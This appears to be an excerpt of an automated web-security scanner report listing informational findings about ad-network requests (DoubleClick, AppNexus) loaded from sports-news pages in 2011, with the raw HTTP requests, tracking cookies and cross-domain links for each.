<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script type="text/javascript" src="http://altfarm.mediaplex.com/ad/js/14302-119028-2056-13?mpt=116368343&mpvc=http://adclick.g.doubleclick.net/aclk%253Fsa%253Dl%2526ai%253DBsgDu3AD2Tfi6PKfMsQfX45SBDNaooYACvvr7-xiemNXWTICFnwMQARgBIJConBM4AFCOi6m_______8BYMnW8obIo_waoAGC5ITwA7IBD3d3dy50d2Fja2xlLmNvbboBCTcyOHg5MF9hc8gBCdoBIGh0dHA6Ly93d3cudHdhY2tsZS5jb20vaGVhZGxpbmVzuAIYwAIFyALomuEKqAMB0QPgy9uX8AkKYegDiALoA7UI9QMAAADA%2526num%253D1%2526sig%253DAGiWqtxCM8gNeEVgTFGRkHDrV3gpF4chqg%2526client%253Dca-pub-7494156027018342%2526adurl%253D">
</script>
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/i.png' alt="(i)" border=0 height=12px width=12px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.twackle.com/headlines%26hl%3Den%26client%3Dca-pub-7494156027018342%26adU%3Dconstantcontact.com%26adT%3DImageAd%26gl%3DUS&usg=AFQjCNGYrvtZV_VHsLMlyVa2Hpm_0LKr7g" target=_blank><img alt="Ads by Google" border=0 height=16px src=http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png width=78px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/abg.js"></script>
...[SNIP]...

18.164. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7494156027018342&output=html&h=250&slotname=0180034002&w=300&lmt=1307986012&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307968011486&bpp=2&shv=r20110608&jsv=r20110607&prev_slotnames=0457253054&correlator=1307968011518&frm=4&adk=44878673&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=2003356553&ga_fc=1&u_tz=-300&u_his=19&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1049&bih=926&eid=33895298&ref=http%3A%2F%2Fwww.twackle.com%2Fheadlines&fu=0&ifi=2&dtd=1100&xpc=Ip6I5XQj3k&p=http%3A//www.twackle.com

The response contains the following links to other domains:

http://pagead2.googlesyndication.com/pagead/abglogo/adc-en-100c-ffffff.png
http://pagead2.googlesyndication.com/pagead/js/graphics.js
http://pagead2.googlesyndication.com/pagead/sma8.js
http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.twackle.com/headlines%26hl%3Den%26client%3Dca-pub-7494156027018342%26adU%3Dwww.csnchicago.com%26adT%3DLatest%2BCarlos%2BBoozer%2BNews%26gl%3DUS&usg=AFQjCNFa0NDW8dWRMNuK1jhaDeYwrGJTfA

Request

GET /pagead/ads?client=ca-pub-7494156027018342&output=html&h=250&slotname=0180034002&w=300&lmt=1307986012&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307968011486&bpp=2&shv=r20110608&jsv=r20110607&prev_slotnames=0457253054&correlator=1307968011518&frm=4&adk=44878673&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=2003356553&ga_fc=1&u_tz=-300&u_his=19&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1049&bih=926&eid=33895298&ref=http%3A%2F%2Fwww.twackle.com%2Fheadlines&fu=0&ifi=2&dtd=1100&xpc=Ip6I5XQj3k&p=http%3A//www.twackle.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698; __ar_v4=SDUW4IOBWFCKJBD7TJN7TI%3A20110613%3A2%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110613%3A2%7CM5OOXYHITZA7XGIMSMOSWH%3A20110613%3A2%7COBXRF4HH6JFXLDDVFSEQTM%3A20110613%3A2

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Set-Cookie: test_cookie=; domain=.doubleclick.net; path=/; Max-Age=0; expires=Mon, 21-July-2008 23:59:00 GMT
X-Content-Type-Options: nosniff
Date: Mon, 13 Jun 2011 12:26:54 GMT
Server: cafe
Cache-Control: private
Content-Length: 9906
X-XSS-Protection: 1; mode=block
Expires: Mon, 13 Jun 2011 12:26:54 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#252f66;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script>
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.twackle.com/headlines%26hl%3Den%26client%3Dca-pub-7494156027018342%26adU%3Dwww.csnchicago.com%26adT%3DLatest%2BCarlos%2BBoozer%2BNews%26gl%3DUS&usg=AFQjCNFa0NDW8dWRMNuK1jhaDeYwrGJTfA" target=_blank><img alt="AdChoices" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/adc-en-100c-ffffff.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

18.165. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7494156027018342&output=html&h=90&slotname=0457253054&w=728&lmt=1307987843&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307969843680&bpp=3&shv=r20110608&jsv=r20110607&prev_slotnames=0457253054%2C0180034002&correlator=1307969843387&frm=4&adk=4288629557&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=1170139454&ga_fc=1&u_tz=-300&u_his=24&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1049&bih=926&ref=http%3A%2F%2Fwww.twackle.com%2Fheadlines&fu=0&ifi=3&dtd=66&xpc=4CTiKLMO8h&p=http%3A//www.twackle.com

The response contains the following links to other domains:

http://s0.2mdn.net/2331885/3-728x90_Janet_20k.jpg
http://s0.2mdn.net/879366/flashwrite_1_2.js

Request

GET /pagead/ads?client=ca-pub-7494156027018342&output=html&h=90&slotname=0457253054&w=728&lmt=1307987843&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307969843680&bpp=3&shv=r20110608&jsv=r20110607&prev_slotnames=0457253054%2C0180034002&correlator=1307969843387&frm=4&adk=4288629557&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=1170139454&ga_fc=1&u_tz=-300&u_his=24&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1049&bih=926&ref=http%3A%2F%2Fwww.twackle.com%2Fheadlines&fu=0&ifi=3&dtd=66&xpc=4CTiKLMO8h&p=http%3A//www.twackle.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698; __ar_v4=SDUW4IOBWFCKJBD7TJN7TI%3A20110613%3A2%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110613%3A2%7CM5OOXYHITZA7XGIMSMOSWH%3A20110613%3A2%7COBXRF4HH6JFXLDDVFSEQTM%3A20110613%3A2

Response

18.166. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7494156027018342&output=html&h=90&slotname=0457253054&w=728&lmt=1307987228&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307969228190&bpp=2&shv=r20110608&jsv=r20110607&prev_slotnames=0457253054%2C0180034002&correlator=1307969227792&frm=4&adk=4288629557&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=806489085&ga_fc=1&u_tz=-300&u_his=22&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1049&bih=926&ref=http%3A%2F%2Fwww.twackle.com%2Fheadlines&fu=0&ifi=3&dtd=45&xpc=a7gbqLcFG9&p=http%3A//www.twackle.com

The response contains the following links to other domains:

http://s0.2mdn.net/2331885/6-728x90_AAA_Jacqueline.jpg
http://s0.2mdn.net/879366/flashwrite_1_2.js

Request

GET /pagead/ads?client=ca-pub-7494156027018342&output=html&h=90&slotname=0457253054&w=728&lmt=1307987228&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307969228190&bpp=2&shv=r20110608&jsv=r20110607&prev_slotnames=0457253054%2C0180034002&correlator=1307969227792&frm=4&adk=4288629557&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=806489085&ga_fc=1&u_tz=-300&u_his=22&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1049&bih=926&ref=http%3A%2F%2Fwww.twackle.com%2Fheadlines&fu=0&ifi=3&dtd=45&xpc=a7gbqLcFG9&p=http%3A//www.twackle.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698; __ar_v4=SDUW4IOBWFCKJBD7TJN7TI%3A20110613%3A2%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110613%3A2%7CM5OOXYHITZA7XGIMSMOSWH%3A20110613%3A2%7COBXRF4HH6JFXLDDVFSEQTM%3A20110613%3A2

Response

18.167. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7494156027018342&output=html&h=90&slotname=0457253054&w=728&lmt=1307987227&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307969227752&bpp=3&shv=r20110608&jsv=r20110607&correlator=1307969227792&frm=4&adk=3937882929&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=806489085&ga_fc=1&u_tz=-300&u_his=22&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1049&bih=926&ref=http%3A%2F%2Fwww.twackle.com%2Fheadlines&fu=0&ifi=1&dtd=59&xpc=hCK7H63bf2&p=http%3A//www.twackle.com

The response contains the following links to other domains:

http://pagead2.googlesyndication.com/pagead/abglogo/adc-en-100c-ffffff.png
http://pagead2.googlesyndication.com/pagead/js/graphics.js
http://pagead2.googlesyndication.com/pagead/sma8.js
http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.twackle.com/headlines%26hl%3Den%26client%3Dca-pub-7494156027018342%26adU%3DMyLocalComcast.com%26adT%3DXFINITY%25C2%25AE%2BTriple%2BPlay%26adU%3DVerizon.com/SmallBusiness%26adT%3DVerizon%2BOfficial%2BSite%26adU%3DConcur.com/Breeze_FreeTrial%26adT%3DManage%2BYour%2BExpenses%26gl%3DUS&usg=AFQjCNFo4B1m2PhQ1lr_Fi96tXNjz8mWew

Request

GET /pagead/ads?client=ca-pub-7494156027018342&output=html&h=90&slotname=0457253054&w=728&lmt=1307987227&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307969227752&bpp=3&shv=r20110608&jsv=r20110607&correlator=1307969227792&frm=4&adk=3937882929&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=806489085&ga_fc=1&u_tz=-300&u_his=22&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1049&bih=926&ref=http%3A%2F%2Fwww.twackle.com%2Fheadlines&fu=0&ifi=1&dtd=59&xpc=hCK7H63bf2&p=http%3A//www.twackle.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698; __ar_v4=SDUW4IOBWFCKJBD7TJN7TI%3A20110613%3A2%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110613%3A2%7CM5OOXYHITZA7XGIMSMOSWH%3A20110613%3A2%7COBXRF4HH6JFXLDDVFSEQTM%3A20110613%3A2

Response

18.168. http://ib.adnxs.com/ab previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ib.adnxs.com
Path:	/ab

Issue detail

The page was loaded from a URL containing a query string:

http://ib.adnxs.com/ab?enc=XI_C9ShcCEDb-X5qvLQEQAAAAMDMzABA2_l-ary0BEBcj8L1KFwIQMLdCrK9z1JN_ayDGovBdy8F8fVNAAAAAGu7BwDLAQAANQEAAAIAAAByowUAaAkBAAEAAABVU0QAVVNEAKAAWAK0Ao0DNAcBAgUCAQQAAAAAayWQewAAAAA.&tt_code=13464&udj=uf%28%27a%27%2C+15288%2C+1307963653%29%3Buf%28%27r%27%2C+369522%2C+1307963653%29%3Bppv%2811776%2C+%275571744102653550018%27%2C+1307963653%2C+1310555653%2C+62058%2C+67944%29%3B&cnd=!TRxHBgjq5AMQ8sYWGAAg6JIEMAA4tAVAAEi1AlAAWABgVWgAcAB4AIABoAGIAQCQAQGYAQGgAQOoAQOwAQG5ATMzM-MoXAhAwQEzMzPjKFwIQMkBMzMzMzMz9z_QAQDZAQAAAAAAAPA_4AEA&ccd=!bgXJLgjq5AMQ8sYWGOiSBCAA&referrer=http://fansided.com/category/nba/&pp=7246C173CA3B52AA

The response contains the following link to another domain:

http://ev.ib-ibi.com/image.sbix?go=2269&pid=32&xid=3420415245200633085

Request

GET /ab?enc=XI_C9ShcCEDb-X5qvLQEQAAAAMDMzABA2_l-ary0BEBcj8L1KFwIQMLdCrK9z1JN_ayDGovBdy8F8fVNAAAAAGu7BwDLAQAANQEAAAIAAAByowUAaAkBAAEAAABVU0QAVVNEAKAAWAK0Ao0DNAcBAgUCAQQAAAAAayWQewAAAAA.&tt_code=13464&udj=uf%28%27a%27%2C+15288%2C+1307963653%29%3Buf%28%27r%27%2C+369522%2C+1307963653%29%3Bppv%2811776%2C+%275571744102653550018%27%2C+1307963653%2C+1310555653%2C+62058%2C+67944%29%3B&cnd=!TRxHBgjq5AMQ8sYWGAAg6JIEMAA4tAVAAEi1AlAAWABgVWgAcAB4AIABoAGIAQCQAQGYAQGgAQOoAQOwAQG5ATMzM-MoXAhAwQEzMzPjKFwIQMkBMzMzMzMz9z_QAQDZAQAAAAAAAPA_4AEA&ccd=!bgXJLgjq5AMQ8sYWGOiSBCAA&referrer=http://fansided.com/category/nba/&pp=7246C173CA3B52AA HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://fansided.com/category/nba/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIyaEDEAoYAiACKAIwveHX7wQQveHX7wQYAQ..; acb645526=![nC'kI/7Z208jSlb1@WvA.(S?enc=PDw8vLS0BEAAAACgmZkBQAAAAKCZmQFA_dR46SaxBUCF61G4HoUJQOtdn4PwOjpp_ayDGovBdy-98PVNAAAAAMf7BwACAgAANQEAAAIAAABpowUADB8BAAEAAABVU0QAVVNEANgCWgDwAgAA3w4BAgUCAQUAAAAAkiK-AQAAAAA.&tt_code=748066&udj=uf%28%27a%27%2C+15288%2C+1307963581%29%3Buf%28%27r%27%2C+369513%2C+1307963581%29%3Bppv%2811776%2C+%277582437727306472939%27%2C+1307963581%2C+1310555581%2C+62058%2C+73484%29%3B&cnd=!nSAXCQjq5AMQ6cYWGAAgjL4EMAA48AVAAEi1AlDH9x9YAGBVaABwAHgAgAGaAYgBFpABAZgBAaABA6gBA7ABAbkBmZmZwR6FCUDBAZmZmcEehQlAyQEzMzMzMzP3P9ABANkBAAAAAAAA8D_gAQA.&ccd=!NQVcLQjq5AMQ6cYWGIy-BCAA; sess=1; uuid2=3420415245200633085; anj=Kfw)k=m<8a)J710KutCqaj=(z9>)/<J>vUGOp(Sy^GiF@?GTp3=T4#Y%=MHt1_q>fO91ikdKX-v>tk2C0pzX3XQ9<6MSq.<j4+1Z76e6(tuzS0m]D!6rU=Z%dIH4#K:-:brcqbSkCbEMKf4SxLN_W'4N>W$ozIa8gYFNxj%5Mi>nT4QX-eTq#)>#^Md^nLRf=?777uW'>W(-+qCv$!.q:u4-hG<v`7c5KK#aG$m!eypOWT<ZdDQ?E%Y88u*7Mf)wx6=p5#hCiik(xxv.aj]>Q4E=a_Y8lw*(]/s'<]%6)_nskE9Q-2y)Dz$C:XC3@f.%w_fTu??`cc:!Q<7FJoWU5zeV7!Hs-voLsRY-tmye9>%Dw^:%#'S+b]j05NcSj%7!N.h$wd-h#F]b:V=G]9DUQr<C.eoIb(M!i(8-d0/f-q]bw=t/`gbDDVw[GSZS[vl@:JSR_S#6CPk4QX6e.kHc6<F3NUHjuF8L0uU/N>xC^)V/.*60z[.y4R+G0o-*Lwk7@0vmDe?Agj1J=6mTbgu!!iw$^1/6mvUu9qn5nn/N@.8@pDrc_K6aearK?.s5iK@gaW]bhk>_>v@/]<f2b3OsGH?oN%_q]3?ozcKqVlI

Response

18.169. http://ib.adnxs.com/ab previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ib.adnxs.com
Path:	/ab

Issue detail

The page was loaded from a URL containing a query string:

http://ib.adnxs.com/ab?enc=L4mzImoSEUADNjFutAUNQAAAAAAAAABAAzYxbrQFDUAvibMiahIRQCoBDVwoyOFc_ayDGovBdy_18PVNAAAAAGu7BwDLAQAANQEAAAIAAABqowUAaAkBAAEAAABVU0QAVVNEANgCWgC0Ao0DFRABAgUCAQQAAAAADRsSBwAAAAA.&tt_code=13464&udj=uf%28%27a%27%2C+15288%2C+1307963637%29%3Buf%28%27r%27%2C+369514%2C+1307963637%29%3Bppv%2811776%2C+%276692850596917870890%27%2C+1307963637%2C+1310555637%2C+62058%2C+67944%29%3B&cnd=!5x36kwjq5AMQ6sYWGAAg6JIEMAA4tAVAAEi1AlAAWABgVWgAcAJ4kP4CgAGeAYgBAJABAZgBAaABA6gBA7ABAbkBjrNOAmoSEUDBAY6zTgJqEhFAyQGOs04CahIBQNABANkBAAAAAAAA8D_gAQA.&ccd=!ZgWBLgjq5AMQ6sYWGOiSBCAA&referrer=http://fansided.com/category/nba/&pp=600386F562F84A93

The response contains the following link to another domain:

http://pixel.quantserve.com/seg/r;a=p-6cp0NSw2i2sSA;redirect=http://ib.adnxs.com/seg?add_code=!qcsegs&member=672&t=2

Request

GET /ab?enc=L4mzImoSEUADNjFutAUNQAAAAAAAAABAAzYxbrQFDUAvibMiahIRQCoBDVwoyOFc_ayDGovBdy_18PVNAAAAAGu7BwDLAQAANQEAAAIAAABqowUAaAkBAAEAAABVU0QAVVNEANgCWgC0Ao0DFRABAgUCAQQAAAAADRsSBwAAAAA.&tt_code=13464&udj=uf%28%27a%27%2C+15288%2C+1307963637%29%3Buf%28%27r%27%2C+369514%2C+1307963637%29%3Bppv%2811776%2C+%276692850596917870890%27%2C+1307963637%2C+1310555637%2C+62058%2C+67944%29%3B&cnd=!5x36kwjq5AMQ6sYWGAAg6JIEMAA4tAVAAEi1AlAAWABgVWgAcAJ4kP4CgAGeAYgBAJABAZgBAaABA6gBA7ABAbkBjrNOAmoSEUDBAY6zTgJqEhFAyQGOs04CahIBQNABANkBAAAAAAAA8D_gAQA.&ccd=!ZgWBLgjq5AMQ6sYWGOiSBCAA&referrer=http://fansided.com/category/nba/&pp=600386F562F84A93 HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://fansided.com/category/nba/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIyaEDEAoYAiACKAIwveHX7wQQveHX7wQYAQ..; acb645526=![nC'kI/7Z208jSlb1@WvA.(S?enc=PDw8vLS0BEAAAACgmZkBQAAAAKCZmQFA_dR46SaxBUCF61G4HoUJQOtdn4PwOjpp_ayDGovBdy-98PVNAAAAAMf7BwACAgAANQEAAAIAAABpowUADB8BAAEAAABVU0QAVVNEANgCWgDwAgAA3w4BAgUCAQUAAAAAkiK-AQAAAAA.&tt_code=748066&udj=uf%28%27a%27%2C+15288%2C+1307963581%29%3Buf%28%27r%27%2C+369513%2C+1307963581%29%3Bppv%2811776%2C+%277582437727306472939%27%2C+1307963581%2C+1310555581%2C+62058%2C+73484%29%3B&cnd=!nSAXCQjq5AMQ6cYWGAAgjL4EMAA48AVAAEi1AlDH9x9YAGBVaABwAHgAgAGaAYgBFpABAZgBAaABA6gBA7ABAbkBmZmZwR6FCUDBAZmZmcEehQlAyQEzMzMzMzP3P9ABANkBAAAAAAAA8D_gAQA.&ccd=!NQVcLQjq5AMQ6cYWGIy-BCAA; sess=1; uuid2=3420415245200633085; anj=Kfu=8fG5EfD>7)*0s]#%2L_'x%SEV/i#-HU4FO?KN1Ipz=Rr7(nTDn(:^i3A^y9mc%vk4^v$yM3WW6G<5`8#q8qLS%.Gg5e[?T1^Q#wfy+>=#D+$s`c(4i[6K.]BEP%$)!].G3x0Ugl[k.@FC+W_hECb[7v:/v)7o'n((hXuS>:L?Wg4KG**/Qd4fR1Ox!Nj0reFd^e6F7/z4Q60)Bep_S01/TEx8MrH?Ndd1irwS?=d6/5Fml/alM2kt41pf67OGU#nuuJid`:>[95_PNPw*2S^*utjJsqu[qYF4WYQmiIaQ%PqxZX9gh2[NaX++0`(^EqUoR9D%B8r%<F+*nV4Ma%nodsEE^eonsyc*xSN1TYiilE!G:HN!E+:hZR[4<>W#)ptuJ+Q9>8dQEmVoxCyp-Y7P`Yp(22q5$yQj96aid[z5)/Nz..vG<JoMpK?G3P^NQr7v_7q`arQA[c/%DmA.C>2v%k7(TxO_'nt?bKZ894/X$!OdQiM(>'?oQ$6P8sU5JWqi+C`KRPZ+=+BU>hL-74*w$1_sBzwirk[GY?$bWkR!w3P$q!mL3sM:9N$_=mPowCi%4-/b!2Tv%YL0@q

Response

18.170. http://ib.adnxs.com/ab previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ib.adnxs.com
Path:	/ab

Issue detail

The page was loaded from a URL containing a query string:

http://ib.adnxs.com/ab?enc=XI_C9ShcCEDb-X5qvLQEQAAAAMDMzABA2_l-ary0BEBcj8L1KFwIQNNP0fWXX0lh_ayDGovBdy_s8PVNAAAAAGu7BwDLAQAANQEAAAIAAAB0owUAaAkBAAEAAABVU0QAVVNEAKAAWAK0Ao0DSQ8BAgUCAQQAAAAAciY2wAAAAAA.&tt_code=13464&udj=uf%28%27a%27%2C+15288%2C+1307963628%29%3Buf%28%27r%27%2C+369524%2C+1307963628%29%3Bppv%2811776%2C+%277010239401247723475%27%2C+1307963628%2C+1310555628%2C+62058%2C+67944%29%3B&cnd=!SxwFBgjq5AMQ9MYWGAAg6JIEMAA4tAVAAEi1AlAAWABgVWgAcAB4AIABnAGIAQCQAQGYAQGgAQOoAQOwAQG5ATMzM-MoXAhAwQEzMzPjKFwIQMkBMzMzMzMz9z_QAQDZAQAAAAAAAPA_4AEA&ccd=!cAXbLgjq5AMQ9MYWGOiSBCAA&referrer=http://sportdfw.com/z-the-fort-worth-four/&pp=ADAA44E9B7576EFC

The response contains the following link to another domain:

http://aidps.atdmt.com/AI/Api/v1/UserRest.svc/Provider/1AC1C520-232B-4E3D-B0CC-A52AC15EB7D4/User/3420415245200633085/gif?meta=appNexus

Request

GET /ab?enc=XI_C9ShcCEDb-X5qvLQEQAAAAMDMzABA2_l-ary0BEBcj8L1KFwIQNNP0fWXX0lh_ayDGovBdy_s8PVNAAAAAGu7BwDLAQAANQEAAAIAAAB0owUAaAkBAAEAAABVU0QAVVNEAKAAWAK0Ao0DSQ8BAgUCAQQAAAAAciY2wAAAAAA.&tt_code=13464&udj=uf%28%27a%27%2C+15288%2C+1307963628%29%3Buf%28%27r%27%2C+369524%2C+1307963628%29%3Bppv%2811776%2C+%277010239401247723475%27%2C+1307963628%2C+1310555628%2C+62058%2C+67944%29%3B&cnd=!SxwFBgjq5AMQ9MYWGAAg6JIEMAA4tAVAAEi1AlAAWABgVWgAcAB4AIABnAGIAQCQAQGYAQGgAQOoAQOwAQG5ATMzM-MoXAhAwQEzMzPjKFwIQMkBMzMzMzMz9z_QAQDZAQAAAAAAAPA_4AEA&ccd=!cAXbLgjq5AMQ9MYWGOiSBCAA&referrer=http://sportdfw.com/z-the-fort-worth-four/&pp=ADAA44E9B7576EFC HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://sportdfw.com/z-the-fort-worth-four/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
